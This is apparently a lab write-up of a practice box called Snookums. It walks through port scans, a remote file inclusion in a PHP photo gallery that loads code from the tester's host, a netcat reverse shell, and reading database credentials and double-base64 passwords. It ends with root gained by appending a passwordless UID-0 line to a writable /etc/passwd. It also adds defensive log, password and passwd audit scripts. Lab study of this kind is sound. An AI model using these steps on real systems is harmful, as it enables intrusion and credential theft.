TCP Ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 06:03 +08
Nmap scan report for 192.168.179.58
Host is up (0.041s latency).
Not shown: 65515 filtered tcp ports (no-response), 12 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
33060/tcp open mysqlx
Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds
TCP Service Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 06:03 +08
Nmap scan report for 192.168.179.58
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.164
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)
| 256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)
|_ 256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Simple PHP Photo Gallery
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: SNOOKUMS; OS: Unix
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.4)
| Computer name: snookums
| NetBIOS computer name: SNOOKUMS\x00
| Domain name: \x00
| FQDN: snookums
|_ System time: 2024-11-23T17:04:21-05:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-11-23T22:04:22
|_ start_date: N/A
|_clock-skew: mean: 1h39m58s, deviation: 2h53m14s, median: -2s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.03 seconds
Port 80
Port 80 is running a Simple PHP Photo Gallery (v0.8).
http://192.168.179.58/
Simple PHP Photo Gallery
Found RFI exploit on exploitdb: https://www.exploit-db.com/exploits/48424
[+] site.com/image.php?img= [ PAYLOAD ]
Inspecting one of the images, we get the relative path of the image: images/examples/image-1.jpg
RFI exploit
http://192.168.179.58/image.php?img=images/examples/image-1.jpg
With the relative path of the image, we try the RFI.
It kind of works.
/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
michael:x:1000:1000:Michael:/home/michael:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
We can also read the /etc/passwd file, but this is really just LFI, so let's try RFI next.
Real RFI
I started a Python HTTP server and tried to connect to it via the RFI.
http://192.168.179.58/image.php?img=http://192.168.45.164:4444
It took quite a while to load, but it does connect.
phpinfo
I created a shell.php with phpinfo() to test if it will execute PHP code.
<?php phpinfo(); ?>
It does.
Error in executing PHP code
Initially I started the Python HTTP server on a random port and couldn't get any execution. Also, the RFI took forever to load.
So I tried changing to a port that is open on the target machine, which is 445 in this case, and it loaded fast and actually executed the PHP code.
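The img= parameter above is abused twice: as LFI (a local path such as /etc/passwd) and as RFI (an http:// URL pointing at the attacker's host). The following is an added example, not code from the writeup or from the gallery project: a small detector that runs over Apache access-log lines and flags both patterns for this endpoint. The log lines are constructed, and the assumption that legitimate values start with images/ is mine.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines modelled on the requests in this writeup:
# the legitimate gallery image, the /etc/passwd read, a remote include, and a
# URL-encoded traversal. None of these lines were captured from the target.
SAMPLE_LOG = """\
192.168.45.164 - - [24/Nov/2024:06:10:01 +0800] "GET /image.php?img=images/examples/image-1.jpg HTTP/1.1" 200 5123
192.168.45.164 - - [24/Nov/2024:06:12:44 +0800] "GET /image.php?img=/etc/passwd HTTP/1.1" 200 1162
192.168.45.164 - - [24/Nov/2024:06:15:09 +0800] "GET /image.php?img=http://192.168.45.164:445/shell.php HTTP/1.1" 200 987
192.168.45.164 - - [24/Nov/2024:06:16:30 +0800] "GET /image.php?img=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1162
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)  # http:, ftp:, data:, php: ...
IMAGE_ROOT = 'images/'  # assumed directory the gallery is meant to serve from

def classify_img(value):
    """Classify one img= value: 'ok', 'wrapper' (any URL scheme, i.e. a remote
    or PHP stream include) or 'lfi' (absolute path, traversal, outside the root)."""
    v = unquote(value)  # second decode catches double-encoded payloads
    if SCHEME_RE.match(v) or v.startswith('//'):
        return 'wrapper'
    if v.startswith('/') or '..' in v.split('/') or not v.startswith(IMAGE_ROOT):
        return 'lfi'
    return 'ok'

def scan_log(text):
    """Return (ip, timestamp, verdict, decoded value) for each suspicious include."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        if url.path != '/image.php':
            continue
        for value in parse_qs(url.query).get('img', []):  # parse_qs URL-decodes once
            verdict = classify_img(value)
            if verdict != 'ok':
                findings.append((m['ip'], m['ts'], verdict, unquote(value)))
    return findings

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```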
PHP Reverse Shell
I replaced the phpinfo with Ivan Sincek’s PHP reverse shell generated on https://www.revshells.com/.
Similar to hosting the HTTP server on an open port, I used an open port for the nc listener:
sudo wrapnc 21
[sudo] password for hans:
listening on [any] 21 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.165.58] 43838
Linux snookums 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
18:50:04 up 48 min, 0 users, load average: 0.00, 0.01, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
bash: no job control in this shell
bash-4.2$
Shell as apache
Looking at the /var/www/html directory, we see a db.php with some credentials.
bash-4.2$ cd /var/www/html
bash-4.2$ ls
README.txt image.php phpGalleryConfig.php
UpgradeInstructions.txt images phpGalleryStyle-RED.css
css index.php phpGalleryStyle.css
db.php js phpGallery_images
embeddedGallery.php license.txt phpGallery_thumbs
functions.php photos thumbnail_generator.php
bash-4.2$ cat db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>
mysql
I tried several times before this, and it hung after I entered the password. What changed was upgrading the shell; I suppose it requires an interactive shell.
bash-4.2$ mysql -u root -p
Enter password: MalapropDoffUtilize1337
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 15
Server version: 8.0.20 MySQL Community Server - GPL
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
We saw the database SimplePHPGal earlier in the db.php file. We use that database and find that there is a users table.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| SimplePHPGal |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.01 sec)
mysql> use SimplePHPGal
Database changed
mysql> show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users |
+------------------------+
1 row in set (0.00 sec)
mysql> select * from users;
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== |
+----------+----------------------------------------------+
3 rows in set (0.00 sec)
We find a few credentials here with what look like hashed passwords. Looking at the /home directory, we have michael.
bash-4.2$ cd /home
bash-4.2$ ls -al
total 0
drwxr-xr-x. 3 root root 21 Jun 9 2020 .
dr-xr-xr-x. 17 root root 224 Jun 9 2020 ..
drwx------. 2 michael michael 100 Jul 9 2020 michael
Seems like the password is encoded in base64, judging by the == at the end.
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
When decoding, it gives me another base64 value. Decoding it again gives me the password.
[09:59] hans@parrot ~/Documents/PGPractice/Snookums/2-shell
% echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d
SG9ja1N5ZG5leUNlcnRpZnkxMjM=
[09:59] hans@parrot ~/Documents/PGPractice/Snookums/2-shell
% echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d | base64 -d
HockSydneyCertify123
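The users table stores passwords as two layers of base64, which is reversible encoding rather than hashing. As an added example (not from the writeup), here is an audit helper that peels base64 layers while the result stays printable text and flags such rows; the sample rows are michael's value from above plus a constructed bcrypt-style placeholder for contrast.

```python
import base64
import binascii
import re
import string

PRINTABLE = set(string.printable) - set('\x0b\x0c')
B64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')

def _strict_b64decode(s):
    """Decode only canonical base64 (valid alphabet, length a multiple of 4)."""
    if not B64_RE.match(s) or len(s) % 4:
        return None
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None

def peel_base64(value, max_layers=8):
    """Repeatedly base64-decode while the output is printable ASCII.
    Returns (layers_removed, innermost_text); 0 layers means 'not base64 text'."""
    text, layers = value, 0
    while layers < max_layers:
        raw = _strict_b64decode(text)
        if raw is None:
            break
        try:
            decoded = raw.decode('ascii')
        except UnicodeDecodeError:
            break  # binary output: the previous layer was already the plaintext
        if not decoded or not set(decoded) <= PRINTABLE:
            break
        text, layers = decoded, layers + 1
    return layers, text

def audit_password_column(rows):
    """Flag users whose stored 'password' is a reversible encoding, not a hash.
    Reports layer count and plaintext length only; the secret itself is not kept."""
    findings = {}
    for user, stored in rows:
        layers, plain = peel_base64(stored)
        if layers:
            findings[user] = (layers, len(plain))
    return findings

# Constructed sample: michael's row from this box plus an invented bcrypt-style hash.
SAMPLE_ROWS = [
    ('michael', 'U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ=='),
    ('example', '$2y$10$CONSTRUCTED.PLACEHOLDER.HASH.not.a.real.value'),
]

if __name__ == '__main__':
    print(audit_password_column(SAMPLE_ROWS))
```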
SSH as michael
ssh michael@192.168.165.58
The authenticity of host '192.168.165.58 (192.168.165.58)' can't be established.
ED25519 key fingerprint is SHA256:rouy0/8CKEfhPY0eheyBSXy00UrbHzUFfNIMlNdCNfI.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:9: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.165.58' (ED25519) to the list of known hosts.
michael@192.168.165.58's password:
[michael@snookums ~]$ cat local.txt
7c82f17841a3b82c9a047e95da9a0e05
Writable /etc/passwd
[michael@snookums /]$ ls -ld /etc/passwd
-rw-r--r--. 1 michael root 1162 Jun 22 2021 /etc/passwd
Shockingly, michael is the owner of /etc/passwd and is able to write to it.
root
We simply insert a new root user (hacker) into /etc/passwd with uid 0 and an empty password. After switching user with su hacker, we are root.
[michael@snookums /]$ echo 'hacker::0:0::/root:/bin/bash' >>/etc/passwd
[michael@snookums /]$ su hacker
[root@snookums /]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@snookums /]# cd ~
[root@snookums ~]# cat proof.txt
9af2bd4a317f7128972cfd5a7f317233
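The privilege escalation relies on two things a defender can check: /etc/passwd is not owned by root, and a second UID-0 entry with an empty password field was appended. The following audit is an added example, not part of the writeup; the sample content is constructed from a few of this box's entries plus the appended hacker line, and the ownership check takes stat values so it can be run against any file.

```python
import os
import stat

SAFE_PW_FIELDS = {'x', '*', '!', '!!'}  # shadow marker or locked account

def audit_passwd_content(text):
    """Flag entries that let a local user become root: extra UID-0 accounts,
    empty password fields (passwordless login), hashes in passwd, malformed lines.
    Returns a list of (line_number, message)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(':')
        if len(fields) != 7:
            findings.append((lineno, 'malformed entry'))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if uid == '0' and name != 'root':
            findings.append((lineno, f'extra UID-0 account {name!r}'))
        if pw == '':
            findings.append((lineno, f'empty password field for {name!r}'))
        elif pw not in SAFE_PW_FIELDS:
            findings.append((lineno, f'password hash stored in passwd for {name!r}'))
    return findings

def audit_passwd_perms(st_uid, st_gid, st_mode):
    """Expect root:root and no group/world write bit (0644 on this box's distro)."""
    findings = []
    if st_uid != 0:
        findings.append(f'owner uid {st_uid}, expected 0 (root)')
    if st_gid != 0:
        findings.append(f'group gid {st_gid}, expected 0 (root)')
    if st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append('group/world writable')
    return findings

def audit_live_passwd(path='/etc/passwd'):
    """Run both checks against a real file on the host."""
    st = os.stat(path)
    with open(path) as fh:
        content = fh.read()
    return audit_passwd_perms(st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode)) + \
        [f'line {n}: {msg}' for n, msg in audit_passwd_content(content)]

# Constructed sample: three entries from this box's /etc/passwd plus the appended line.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
michael:x:1000:1000:Michael:/home/michael:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
hacker::0:0::/root:/bin/bash
"""
```

On the box above, audit_passwd_perms(1000, 0, 0o644) already reports the non-root owner before any line is appended.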